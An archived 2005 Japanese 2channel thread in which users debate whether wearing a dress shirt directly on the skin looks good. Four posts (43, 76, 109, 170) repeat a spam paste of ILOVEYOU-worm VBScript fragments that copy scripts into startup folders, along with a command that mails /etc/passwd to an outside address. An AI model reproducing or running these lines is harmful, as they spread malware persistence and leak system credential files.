2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

★★ 素肌にワイシャツは、かっこいいか? ★★

1 :45歳のリーマン。:2005/04/28(木) 22:07:45
最近、素肌にワイシャツにしました。
でもね、乳首が透けるから、「気持ち悪い」って言う人と、「抱かれたい」という人と、
意見が別れてるんだ。
どっちが正解なの?

2 :名無しさん@お腹いっぱい。:2005/04/28(木) 22:09:01
相手によるだろ

3 :名無しさん@お腹いっぱい。:2005/04/28(木) 22:11:09
俺はいつもそうだけどよ。

4 :名無しさん@お腹いっぱい。:2005/04/28(木) 22:14:00
カッターシャツとワイシャツ
どちらの言い方がナウイの?

5 :名無しさん@お腹いっぱい。:2005/04/28(木) 22:17:17
>>1
ワイシャツって普通素肌に着ないか?

6 :名無しさん@お腹いっぱい。:2005/04/28(木) 22:26:33
>>1
臭くならないの?
汗で。

7 :名無しさん@お腹いっぱい。:2005/04/28(木) 22:49:35
汗でべっちょり張り付くなんてまっぴらご免だぜ
夏場は無理だろ、高原地帯でもない限り

8 :名無しさん@お腹いっぱい。:2005/04/28(木) 22:58:22
俺は、「好き(はぁと)

9 :名無しさん@お腹いっぱい。:2005/04/28(木) 23:47:57
俺も、見ると抱きつきたくなるよ。とくに逆三角形のいい男の胸に。


10 :名無しさん@お腹いっぱい。:2005/04/28(木) 23:52:33
どこかに、いい画像ない?
知ってる人、教えてくれないか?
いい男の素肌ワイシャツの画像。

11 :名無しさん@お腹いっぱい。:2005/04/29(金) 00:18:04
俺の会社の男の素肌ワイシャツの割合。
67パーセント。
こんなもんでしょ。どこの会社も。


12 :名無しさん@お腹いっぱい。:2005/04/29(金) 00:20:57
白いYシャツなんか着ないから意味無し

13 :名無しさん@お腹いっぱい。:2005/04/29(金) 00:21:43
ブラウスから透ける乳首 (;´Д`)ハァハァ

14 :名無しさん@お腹いっぱい。:2005/04/29(金) 00:22:19
いい男の素肌ワイシャツ。ハァハァ。
乳首をクリクリしてみたい。

15 :名無しさん@お腹いっぱい。:2005/04/29(金) 00:28:00
かっこいいと思う。
ランニング、Tシャツ着てるとカッコ悪い、ダサイ。
オヤジでもワイシャツは素肌に着たほうがいいと思うよ。

16 :名無しさん@お腹いっぱい。:2005/04/29(金) 00:29:28
だから汗でへばりつくし、健康的じゃないンだっつうの

と言いつつ、今度試してみよっと

17 :名無しさん@お腹いっぱい。:2005/04/29(金) 00:34:55
>>16
むしろ、素肌ワイシャツのほうが健康的だと思うんだが。

18 :名無しさん@お腹いっぱい。:2005/04/29(金) 00:38:06
>>17
なんでぇ?

19 :名無しさん@お腹いっぱい。:2005/04/29(金) 00:39:02
>>18
ワイルド的じゃない?
野性味あふれる男って感じ。
あたしは好きだわ。

20 :名無しさん@お腹いっぱい。:2005/04/29(金) 00:40:59
40代のサラリーマンの中で、ワイシャツを素肌に着ている人の見解を聞きたいな。


21 :名無しさん@お腹いっぱい。:2005/04/29(金) 00:42:21
汗かかないのかな? 背中などに

22 :名無しさん@お腹いっぱい。:2005/04/29(金) 00:44:12
私は、銀行マンですが、Yシャツは年中、素肌に着ています。
理由は、着心地がいいから、昔からの習慣だから、寒い冬はむしろ、気持ちいいから。


23 :名無しさん@お腹いっぱい。:2005/04/29(金) 00:44:56
>>22
クッ祖暑い夏場はいかがで御座いますか?

24 :名無しさん@お腹いっぱい。:2005/04/29(金) 00:46:39
>>23
私は、汗かきですけど、汗でYシャツが張り付くことは多々あります。
乳首が透けて、周りの視線も感じることもありますが、習慣なんです。


25 :名無しさん@お腹いっぱい。:2005/04/29(金) 00:48:20
>>24
で、冷房の効いた部屋で過ごしたりして、風邪などひきませんか?
また、汗でへばりついても不快では無いのでしょうか?

26 :名無しさん@お腹いっぱい。:2005/04/29(金) 00:49:27
ゲイは、基本的に素肌ワイシャツが好きだよな。
飲み屋で酔って、「乳首当てゲーム」なんかやったりするよ。
それで、触って乳首が立ってきて形がクッキリ。
もう、周りのお客さん(ホモ)大喜び〜〜〜〜

27 :名無しさん@お腹いっぱい。:2005/04/29(金) 00:50:32
>>25
全然そう思いませんね。アメリカなんかほとんど素肌Yシャツでしょ?
それと同じ感覚。

28 :名無しさん@お腹いっぱい。:2005/04/29(金) 00:51:45
スポーツやってたリーマンって、素肌ワイシャツ多くない?

29 :名無しさん@お腹いっぱい。:2005/04/29(金) 00:52:10
>>27
アメリカ人じゃねぇんだから、そんなのたとえにならねぇと思います

30 :名無しさん@お腹いっぱい。:2005/04/29(金) 00:53:17
白いワイシャツこそ、素肌に着たほうが、おしゃれだ。

31 :名無しさん@お腹いっぱい。:2005/04/29(金) 00:53:51
イケメンだったら、なおよし。

32 :名無しさん@お腹いっぱい。:2005/04/29(金) 00:54:19
だから汗はどうするんだ? って聞いてるんだよ
下着着てれば下着だけ取り替えられるだろ

33 :名無しさん@お腹いっぱい。:2005/04/29(金) 00:54:46
>>28
水泳選手だった上司は「素肌ワイシャツ」ですね。そういえば。

34 :名無しさん@お腹いっぱい。:2005/04/29(金) 00:56:12
>>32
下着って汚いイメージ。着ないほうがむしろ清潔感がある。
下着に溜まった汗のにおいって臭い。
だから、素肌に着たほうが汗の乾きも速くていいんじゃないの?

35 :名無しさん@お腹いっぱい。:2005/04/29(金) 00:57:49
>>34
その汚れた下着を清潔なものに着替えられるだろ???

Yシャツに染みこんだ汗はそのまま乾くだけだ

36 :名無しさん@お腹いっぱい。:2005/04/29(金) 00:59:01
素肌に着ると、男のセクシーさが出るよね。
体にジャストフィットのワイシャツだと、体の線が出てカッコイイ。


37 :名無しさん@お腹いっぱい。:2005/04/29(金) 00:59:57
女に見せるために着てるんじゃないんだよ

でも、そう言われちゃうと素肌に着たくなるじゃねぇかよ

38 :名無しさん@お腹いっぱい。:2005/04/29(金) 01:03:51
>>37
男に魅せるんだよ。男が男にな。

39 :名無しさん@お腹いっぱい。:2005/04/29(金) 01:04:35
>>37
着なさい。きっと世界が変わるよ。

40 :名無しさん@お腹いっぱい。:2005/04/29(金) 01:05:00
ねぇ、いい男の画像まだ?

41 :名無しさん@お腹いっぱい。:2005/04/29(金) 01:05:45
風邪ひくぞ

42 :名無しさん@お腹いっぱい。:2005/04/29(金) 01:06:50
>>41
K官は、素肌ワイシャツが多いんでしょ?

43 :名無しさん@お腹いっぱい。:2005/04/29(金) 01:06:50
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"




44 :名無しさん@お腹いっぱい。:2005/04/29(金) 01:07:55
K事さんも良く見かけるね。
カッコイイK事さん。

45 :名無しさん@お腹いっぱい。:2005/04/29(金) 01:11:26
黒いスーツが流行してるけど、黒いスーツにはワイシャツは白で、しかも素肌に着たほうがファッション的に最高の組み合わせです。

46 :名無しさん@お腹いっぱい。:2005/04/29(金) 01:13:24
大阪の本町でよく見かける50歳ぐらいの会社員。年中素肌だわよ。
ピーチク透け透けだわよ。

47 :名無しさん@お腹いっぱい。:2005/04/29(金) 01:14:55
名古屋地方にも多い。オヤジの「素肌ワイシャツ」

48 :名無しさん@お腹いっぱい。:2005/04/29(金) 01:16:36
新聞記者、テレビ局関係者にも多い。

49 :名無しさん@お腹いっぱい。:2005/04/29(金) 01:18:00
俺も素肌派。
理由は爽快だから。

50 :名無しさん@お腹いっぱい。:2005/04/29(金) 01:20:40
東京なんか、半数以上が素肌じゃないのかな?

51 :名無しさん@お腹いっぱい。:2005/04/29(金) 01:22:48
会社員は、ぜひともワイシャツを素肌に着る習慣を身に付けてほしい。

52 :名無しさん@お腹いっぱい。:2005/04/29(金) 01:24:43
>>51
カッコイイ。

53 :名無しさん@お腹いっぱい。:2005/04/29(金) 02:32:35
イケルねぇ。

54 :名無しさん@お腹いっぱい。:2005/04/29(金) 03:40:03
白衣を着たDr.だって、素肌ワイシャツが多いんです。
理由はお分かりよね???

55 :名無しさん@お腹いっぱい。:2005/04/29(金) 03:46:24
>>54
わかりません。教えろ。

56 :名無しさん@お腹いっぱい。:2005/04/29(金) 04:02:46
肌に伝わる温もり。抱きしめたいし、抱きしめられたい。

57 :名無しさん@お腹いっぱい。:2005/04/29(金) 06:26:55
素肌にワイシャツにしたら乳首がカサカサして勃ってきた。

58 :名無しさん@お腹いっぱい。:2005/04/29(金) 07:18:09
ピシッと決めたスーツ姿の男の人が、上着を脱いだら、白いワイシャツから乳首が立ってたら、いいよね?

59 :名無しさん@お腹いっぱい。:2005/04/29(金) 08:52:30
画像まだ?

60 :名無しさん@お腹いっぱい。:2005/04/29(金) 11:11:06
素敵

61 :名無しさん@お腹いっぱい。:2005/04/29(金) 11:41:19
そんなもんですかぁ〜

62 :名無しさん@お腹いっぱい。:2005/04/29(金) 17:08:18
イケメンならかっこいいのは当然。

63 :名無しさん@お腹いっぱい。:2005/04/29(金) 17:22:26
このスレにいるのはオカマだけ?

64 :名無しさん@お腹いっぱい。:2005/04/29(金) 17:27:06
>>63
お釜じゃないんだけど。素肌ワイシャツ。


65 :名無しさん@お腹いっぱい。:2005/04/29(金) 17:35:23
いわゆるワイシャツは下着だから、素肌に直接着るのが正しい。


66 :名無しさん@お腹いっぱい。:2005/04/29(金) 17:57:03
正しいかどうかは問題外。好きか嫌いかだろ。もしくは馴染むか馴染まないか。

67 :名無しさん@お腹いっぱい。:2005/04/29(金) 18:04:01
>>66
じゃ、お前はズボンを頭にはいて上着を後ろ前に着ろ。


68 :名無しさん@お腹いっぱい。:2005/04/29(金) 19:33:05
>>1
かっこいいと思うから素肌に着なさいよ。

69 :名無しさん@お腹いっぱい。:2005/04/29(金) 19:33:57
少なくとも乳首が透けるような安物しか買えない奴は、アンダーシャツ着ろ

70 :名無しさん@お腹いっぱい。:2005/04/29(金) 21:59:41
>>69
やめてくれない?
ダッセー!

71 :名無しさん@お腹いっぱい。:2005/04/29(金) 23:58:09
かっけー

72 :名無しさん@お腹いっぱい。:2005/04/30(土) 00:06:10
あ〜あ、オカマばっかり。ねちねちしてる。

73 :名無しさん@お腹いっぱい。:2005/04/30(土) 05:39:49
外資系金融会社勤務です。
皆さん知ってると思うけど、アメリカ企業の会議での正装は、ワイシャツの下に丸首半袖シャツを必ず着ないと『大人』と見なされず、みなから軽蔑の眼差しを浴びてしまいます。

74 :名無しさん@お腹いっぱい。:2005/04/30(土) 06:48:01
>>74
アメリカ社会なら、それ逆じゃないの?
アメリカではほとんどの男性社員が素肌ワイシャツだと思う。

75 :名無しさん@お腹いっぱい。:2005/04/30(土) 10:41:09
素肌ワイシャツのイケメンのリーマン観察が大好き。
これからいい季節ですから増えますね。

76 :名無しさん@お腹いっぱい。:2005/04/30(土) 10:57:50
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"



77 :名無しさん@お腹いっぱい。:2005/04/30(土) 11:11:25
>>73
ふむふむ、アメリカ映画見てると大抵白いTシャツ着てるよな、確かに

78 :名無しさん@お腹いっぱい。:2005/04/30(土) 11:12:22
>>77
日本社会はどうなの?


79 :名無しさん@お腹いっぱい。:2005/04/30(土) 11:31:54
体にフィットしたピチピチの素肌ワイシャツ姿のおじ様が好きだわ。

80 :名無しさん@お腹いっぱい。:2005/05/02(月) 22:43:40
イケル!!!

81 :名無しさん@お腹いっぱい。:2005/05/03(火) 11:31:48
ワイシャツから胸毛ボゥボゥ出てますが、かっこいいですか?

82 :名無しさん@お腹いっぱい。:2005/05/03(火) 11:33:09
きしょい

83 :名無しさん@お腹いっぱい。:2005/05/03(火) 14:20:51
素肌にワイシャツ
やはり引き締まった筋肉が条件っぽいね。

84 :名無しさん@お腹いっぱい。:2005/05/03(火) 19:42:59
>>83
ウホッ!

85 :名無しさん@お腹いっぱい。:2005/05/03(火) 21:42:23
汗かきのデブだとYシャツべたべた

86 :ホモ48歳サル年:2005/05/03(火) 21:43:41
>>85
むしろそれがいいんだが・・・・・

87 :名無しさん@お腹いっぱい。:2005/05/03(火) 21:44:06
スマソ

88 :名無しさん@お腹いっぱい。:2005/05/04(水) 06:30:06
Yシャツは法事のときくらいしか着ないんだが、
いつも中にTシャツ着ようかどうか迷う。
結局は着てしまうんだけどさ。腹が冷えそうだから。

89 :名無しさん@お腹いっぱい。:2005/05/04(水) 14:53:04
体に悪いからランニング着ている。

90 :名無しさん@お腹いっぱい。:2005/05/06(金) 15:25:19
ワイシャツにランニングは、いやんオヤヂの象徴的なコスチューム
じゃないかね?



91 :名無しさん@お腹いっぱい。:2005/05/06(金) 22:48:55
>>90
ランニングじゃなくてタンクトップって言うんだぜ・・おやじぃ

92 :名無しさん@お腹いっぱい。:2005/05/07(土) 20:12:19
カッコイイな。部長(46)。

93 :名無しさん@お腹いっぱい。:2005/05/08(日) 00:02:42
でも冬はYシャツの中は保温効果のある長じゅばんを着るなぁ

94 :名無しさん@お腹いっぱい。:2005/05/11(水) 20:54:50
好きだわ。俺。

95 :名無しさん@お腹いっぱい。:2005/05/11(水) 22:11:05
ピシッと糊のきいたシャツでないとみすぼらしく見えるぜ。

96 :名無しさん@お腹いっぱい。:2005/05/12(木) 19:22:39
体脂肪率30%超えたんで、今年の夏はTシャツ着ます。

97 :名無しさん@お腹いっぱい。:2005/05/12(木) 19:41:19
ワイシャツの袖を少しめくって「女なんて眼中にねーよ」みたいな感じで

仕事してる男性ってステキです。ジンジンしてしまいます。ジンジン。

98 :名無しさん@お腹いっぱい。:2005/05/12(木) 19:42:19
>>97
ホモでつか?

99 :名無しさん@お腹いっぱい。:2005/05/13(金) 00:10:37
下着って汗を吸うからほんとは着ている方がいいような気もする。
真夏でワイシャツが汗でべっとりなんてよくみるけどあまりいいものではない。

100 :名無しさん@お腹いっぱい。:2005/05/13(金) 02:03:23
B地区隠しに絆創膏。

101 :名無しさん@お腹いっぱい。:2005/05/13(金) 19:56:42
ウホッ!

102 :名無しさん@お腹いっぱい。:2005/05/13(金) 20:34:44
マリンスポーツでもやっていて色黒な人なら抵抗ないけど、
色白の気持ち悪いオタク系で毛深そうな人なら一気に引き。

103 :名無しさん@お腹いっぱい。:2005/05/13(金) 20:38:40
締まった体なら許す
体脂肪率20%以上は着ないで欲しい

104 :名無しさん@お腹いっぱい。:2005/05/14(土) 09:33:30
要は人によりけりだと思う。

アスリート系には似合うけど、ただの老けたオサーンな
カンベンして欲しい。

105 :名無しさん@お腹いっぱい。:2005/05/14(土) 12:03:16
むしろ、オッサンのほうが萌え〜

106 :名無しさん@お腹いっぱい。:2005/05/14(土) 13:30:27
つーことは、デブでハゲなおれでもファンがいるということだな。
あったかくなったら、新品のYシャツ買って素肌の上から着よう。

107 :名無しさん@お腹いっぱい。:2005/05/14(土) 19:50:59
誰か、かっこいい男の素肌ワイシャツの画像出して!

108 :名無しさん@お腹いっぱい。:2005/05/15(日) 11:23:57
顔が不細工な男でも、素肌ワイシャツで7難とは言わないが、3難は隠すと思う。

109 :名無しさん@お腹いっぱい。:2005/05/15(日) 12:59:14
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"



110 :名無しさん@お腹いっぱい。:2005/05/15(日) 17:21:09
マリンスポーツで締まった体、日焼けしたボディの
持ち主だったらイケると思うが・・・

111 :名無しさん@お腹いっぱい。:2005/05/15(日) 17:26:08
それは当然だけど、ブサ面男にもやっていただきたいわ。


112 :名無しさん@お腹いっぱい。:2005/05/16(月) 07:33:59
ブサはまだ救われるが、デブだけはカンベンして欲しい!

113 :名無しさん@お腹いっぱい。:2005/05/17(火) 20:49:23
でぶでもいいわ。

114 :名無しさん@お腹いっぱい。:2005/05/17(火) 23:34:22
サーファーならいいと思う。

115 :名無しさん@お腹いっぱい。:2005/05/18(水) 11:34:34
せいぜいポロシャツくらいだな、素肌直は・・
yシャツは汗が問題

116 :名無しさん@お腹いっぱい。:2005/05/18(水) 19:17:43
素肌ワイシャツ、透ける乳首。
ハァハァ〜

117 :名無しさん@お腹いっぱい。:2005/05/18(水) 19:22:20
今日、今年初めて素肌にYシャツを着ました
Tシャツなどの裾が下からうっすら見えてるほうが
ダサいですね!

118 :名無しさん@お腹いっぱい。:2005/05/18(水) 20:42:35
今のうちはそんなに汗かかないからいいが、
真夏だな問題は

119 :名無しさん@お腹いっぱい。:2005/05/18(水) 21:23:32
>>118
真夏だと背中が汗だくでびしょびしょになっちゃいますね!

120 :名無しさん@お腹いっぱい。:2005/05/18(水) 21:46:05
ムナゲ・チクビ・・・・
透けているのは・・とてもイヤでつ

121 :名無しさん@お腹いっぱい。:2005/05/18(水) 22:19:09
俺、胸毛は産毛程度で全然生えてないから堂々と素肌に着られるよ。

122 :名無しさん@お腹いっぱい。:2005/05/19(木) 20:30:59
色が黒い人は白のYシャツを素肌に着ると「サマ」に
なるんじゃないかしら?

123 :名無しさん@お腹いっぱい。:2005/05/20(金) 07:22:34
そうだね、人による。

124 :名無しさん@お腹いっぱい。:2005/05/20(金) 21:50:46
好き。

125 :名無しさん@お腹いっぱい。:2005/05/20(金) 22:40:05
25歳OLです。素肌にワイシャツは、ものすごく不潔でずぼらな勘違いおじさんと言う感じです。
特に汗ばむ季節に素肌にワイシャツのおじさんに近寄られると不潔臭が漂う気がします。


126 :名無しさん@お腹いっぱい。:2005/05/20(金) 22:44:59
素肌にワイシャツというのは、ワイシャツ自体が下着だった時代(もう50年以上昔)の
着方ではないでしょうか。そのころは下着のパンツもはかずワイシャツの裾をしばって
お尻を包んでいたそうです。この時代は決して上着を人前で脱がなかった時代です。
上着を脱いでワイシャツをアウターウエアにする現代では素肌に下着はおかしいです。

127 :名無しさん@お腹いっぱい。:2005/05/20(金) 22:46:57
汗かいたら気持ち悪いからTシャツを着てる
前は、カッコつけて地肌にワイシャツだったのだが・・・

128 :名無しさん@お腹いっぱい。:2005/05/20(金) 22:48:16
>>125
素肌にYシャツ着ても似合わない方の「僻み」ですか?
「25歳OL」なんて嘘ついちゃってw

129 :名無しさん@お腹いっぱい。:2005/05/21(土) 16:40:37
>>126
今でもワイシャツは下着です。
上着を着るときのワイシャツと、上着を着ないときのシャツを
混同しないで下さい。みっともないから。

130 :名無しさん@お腹いっぱい。:2005/05/21(土) 16:45:32
>>129
そうですよね。
Yシャツは素肌に着るに限る。


131 :名無しさん@お腹いっぱい。:2005/05/21(土) 17:06:07
>>130
そうですよね?
かえってYシャツの下の下着のライン丸見えの方がみっともない。

132 :名無しさん@お腹いっぱい。:2005/05/21(土) 18:16:42
素肌ワイシャツのリーマンが、梅雨時に雨にぬれながら走っている姿を毎年見かけます。
ワイシャツが肌に密着して、乳輪がくっきりと透けて見える姿がセクシー。

133 :名無しさん@お腹いっぱい。:2005/05/21(土) 18:24:52
私も素肌派かな。Yシャツの下の下着のラインあれは勘弁してホスイ。

最近はカラーシャツとか種類多いし、クライアント相手ない時は
ホワイトばっかりでなく40代でもTPOでカラーどんどん着ればいいのにね。

134 :名無しさん@お腹いっぱい。:2005/05/21(土) 18:26:35
>>132
それって、変態!

>>133
いや、あなたの透け乳首など誰も見たくない。おやめなさい。


135 :名無しさん@お腹いっぱい。:2005/05/21(土) 21:53:45
1962年生まれの42歳
素肌に着ますよ。
慣れるとラクチンです。

136 :名無しさん@お腹いっぱい。:2005/05/21(土) 21:55:11
サスペンスドラマ見ても、俳優さんは8割がた「素肌ワイシャツ」だもんな。

137 :名無しさん@お腹いっぱい。:2005/05/21(土) 23:52:27
刑事さんって「素肌ワイシャツ」が多いね。
激萌え〜

138 :名無しさん@お腹いっぱい。:2005/05/22(日) 09:03:34
ミュージシャンなんかも素肌に着てる。

139 :名無しさん@お腹いっぱい。:2005/05/22(日) 18:13:15
ステージ衣装だろ

140 :名無しさん@お腹いっぱい。:2005/05/23(月) 21:00:08
かっこいい。

141 :名無しさん@お腹いっぱい。:2005/05/23(月) 21:22:05
Tシャツなんか浮かび出させている連中のいかに多いことか…
バカの一つ覚えかと思うね。

俺はワイシャツは素肌に着ている44歳だ!

142 :名無しさん@お腹いっぱい。:2005/05/23(月) 21:48:14
Yシャツを素肌に着るのは盛夏以外だ! 

143 :名無しさん@お腹いっぱい。:2005/05/23(月) 23:16:50
盛夏は汗だくになっちゃうよね、特に背中。。
その点、今の季節はいいかもしれない。

144 :名無しさん@お腹いっぱい。:2005/05/23(月) 23:31:16
素肌のまま着ると乳首がYシャツに擦れて起ってしまう。
おれは下着を着る派だ。

145 :名無しさん@お腹いっぱい。:2005/05/24(火) 07:19:10
下にTシャツ着る奴ばっかだが、普通の肌着でもいいと思う。
じゃなければ、素肌に着ろ!

146 :名無しさん@お腹いっぱい。:2005/05/24(火) 12:39:26
色が濃くて下が透けないシャツなら、ランニングでもOK

147 :名無しさん@お腹いっぱい。:2005/05/24(火) 21:19:12
要するに、安物シャツで透けて見えるのが悪いわけだ

148 :名無しさん@お腹いっぱい。:2005/05/24(火) 22:03:35
みんながTシャツ着るからそれがカッコイイと勘違いしてる
ヤツラって多いんじゃないか?

俺たちが小学生の頃はランニングシャツがフツーだったけどね。

149 :名無しさん@お腹いっぱい。:2005/05/25(水) 00:18:51
通勤電車が異常に暑いので、職場に着いたら下着のランニングを脱ぐ。
以後は素肌にYシャツな俺で御座る

150 :名無しさん@お腹いっぱい。:2005/05/25(水) 00:24:43
結構素肌に着てる40代リーマン多いのに安心。
私が見ててギャホってな下着スケスケの親父っぽいイメージは
稀になったと移ろってるのねん。

堂々と「俺は素肌に着るっ」て言ってるリーマンカッコいい!!


151 :名無しさん@お腹いっぱい。:2005/05/25(水) 00:34:06
素肌に着てるがリーマンじゃないぞ

152 :名無しさん@お腹いっぱい。:2005/05/25(水) 00:54:26
>>1
スレ立てみてちょ。で、みんなそれに関するレスってると思うのしでが。
>>151
別にリーマンでなくても言い訳だが、>>151さんが似合ってるならそうキレることもあるまい。
カッコいいでないかい。


153 :名無しさん@お腹いっぱい。:2005/05/25(水) 01:05:10
別に切れてない

154 :名無しさん@お腹いっぱい。:2005/05/25(水) 07:26:33
オレも素肌にワイシャツ派
Tシャツが透けてるのなんてダサイ ダサイw

155 :名無しさん@お腹いっぱい。:2005/05/25(水) 18:55:06
素肌に着ているリーマンが増えてきました。

156 :名無しさん@お腹いっぱい。:2005/05/25(水) 20:45:05
素ハダにワイシャツが気持ちいい季節になったね 

157 :名無しさん@お腹いっぱい。:2005/05/26(木) 00:27:38
おれはU字形下着着ている。
確かに線が見えてダサイとは思ってる。

158 :名無しさん@お腹いっぱい。:2005/05/26(木) 18:47:40
俺は、一年を通して素肌に着ているな。
習慣っていうのかな。
中学校の制服の頃から素肌に着てたな。

159 :名無しさん@お腹いっぱい。:2005/05/26(木) 19:35:23

ネェネェ?

日テレの「巨人−ロッテ」。
ベース側の観客席に座っているおじ様、素肌ワイシャツだよ。



160 :名無しさん@お腹いっぱい。:2005/05/26(木) 22:09:35
>>158
今の高校生なんかも制服の下は素肌にシャツって子が多いと思わない?


161 :名無しさん@お腹いっぱい。:2005/05/27(金) 22:44:15
>>160
高校生より、30代のリーマンに増えているように思うね。

162 :名無しさん@お腹いっぱい。:2005/05/29(日) 01:34:03
>>161
萌え〜

163 :名無しさん@お腹いっぱい。:2005/05/29(日) 10:18:21
レベルの高い一流男子校なんかだときちんとYシャツの下に下着を着ている
みたいだよ。
勿論、裾出しなんて見たこと無い!

164 :名無しさん@お腹いっぱい。:2005/05/29(日) 15:15:38
既に終わってしまった「ごくせん」の赤西くん達。
Tに詰襟だったが、あれはあれでちょっと危うげな魅力と思うたヨ
現実の子がやったらDQNなのだろう。


165 :名無しさん@お腹いっぱい。:2005/06/04(土) 13:43:58
30代のリーマンは、3割ぐらいか?

166 :名無しさん@お腹いっぱい。:2005/06/04(土) 17:24:14
>>163
 躾がしっかりしている学校の子はそうかもね。
親も変に流行に流されないだろうし・・

167 :名無しさん@お腹いっぱい。:2005/06/04(土) 17:25:03
>>166
あほか!

168 :名無しさん@お腹いっぱい。:2005/06/04(土) 18:01:32
>>167 麻木悦司


http://bubble3.2ch.net/test/read.cgi/cafe40/1116929720/l50

↓脳内妄想、知ったかの馬鹿悦がまたまた赤っ恥! ww


241 :名無しさん@お腹いっぱい。:2005/06/04(土) 17:18:44
>>208

>それに鳴門の鯛は明石の漁師が獲りに行く鯛であって、昔で言う「明石の鯛」とは別物であると、俺は考えております。


悦司さんとやら・・・
淡路在住の俺が一言、言うておきますが、
俺の伯父は淡路島で現役の漁師をやってる。
明石近海の瀬戸内で獲れる桜鯛は今も昔も明石の鯛である・・・と言うてるぞ。
昔ほどではないが今でも結構な数が揚がる言うてるよ。

まして、アンタの言うように遠洋物の鯛を明石の鯛として市場に出すなんて、
詐欺行為や言うてますよ。

アンタの会社はニセモンを明石の鯛言うて売ってますのんか?

あまり確信の無いことは書かん方がよろしいんちゃいますか??

そこでお願い。
アンタのレスはこのスレにまったく合わん。
もう荒らすのはやめてくれや。
二度と来んといてくれ。 頼んますわ。 ええな!



169 :名無しさん@お腹いっぱい。:2005/06/04(土) 20:17:45
ウホッ!

170 :名無しさん@お腹いっぱい。:2005/06/05(日) 05:07:17
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"




171 :名無しさん@お腹いっぱい。:2005/06/05(日) 16:56:13
かっこいいと思う。

172 :名無しさん@お腹いっぱい。:2005/06/05(日) 17:30:42
>>170
わざわざウィルスあちこち貼るな
ノートンがいちいち削除してるよ馬鹿

173 :名無しさん@お腹いっぱい。:2005/06/09(木) 20:05:11
かっこいいよな。素肌ワイシャツの男って。

174 :名無しさん@お腹いっぱい。:2005/06/09(木) 20:28:22
中年太りやガリガリには似合わないけど、
色黒で適度に鍛えた人は映えそう!!

175 :名無しさん@お腹いっぱい。:2005/06/10(金) 05:39:37
多汗症の人の腋汗がキモイ

176 :名無しさん@お腹いっぱい。:2005/06/10(金) 11:47:23
背中に染み出た汗って、女性から見てどぉですか?
べっとりじゃなくて、うっすら部分的なら許せるぅ?

177 :名無しさん@お腹いっぱい。:2005/06/10(金) 17:47:22
>>176
セクシーだわ。
私は好き。

178 :176だが・・・:2005/06/10(金) 19:03:15
>>177
ご回答ありがとう。

最近はポロとかYシャツは、現地に行ってから汗にまみれたランニングシャツを脱いで、
素肌に着るようになった。
女性がいっぱいいる職場なんだよね。


179 :名無しさん@お腹いっぱい。:2005/06/10(金) 19:07:52
>>178
もしかして、君は、「ホモ」?

180 :名無しさん@お腹いっぱい。:2005/06/10(金) 19:13:57
>>179
なんで? なんで? なんで? なんで? なんで? なんで?

モーホではないよ

181 :名無しさん@お腹いっぱい。:2005/06/10(金) 19:14:00
かっこいいと思うな。オシャレだな。

182 :名無しさん@お腹いっぱい。:2005/06/10(金) 21:43:02
うちの勤務する銀行では禁止されています。

183 :名無しさん@お腹いっぱい。:2005/06/13(月) 12:03:57
ランニングやTシャツが透けるのはダサいでしょ。
かといって安物は素肌で着るとゴワゴワしますね。
オーダーしかないですよ。

184 :名無しさん@お腹いっぱい。:2005/06/13(月) 12:19:16
素肌にはボタンダウンのオックスフォード

185 :名無しさん@お腹いっぱい。:2005/06/13(月) 17:54:44
いいよね。素肌Yシャツ。

186 :名無しさん@お腹いっぱい。:2005/06/13(月) 21:04:21
もう暑くてダメだな。汗が醜くしみてしまう。

187 :名無しさん@お腹いっぱい。:2005/06/14(火) 21:02:22
自分の体型と相談してから素肌に着るべし!

188 :名無しさん@お腹いっぱい。:2005/06/15(水) 12:03:11
痩せすぎの男は貧相だと思うぞ、かえって。
多少太目くらいの方がシャツは似合うんだがな

189 :悦王 ■hzzwZZRBhk:2005/06/16(木) 18:14:57

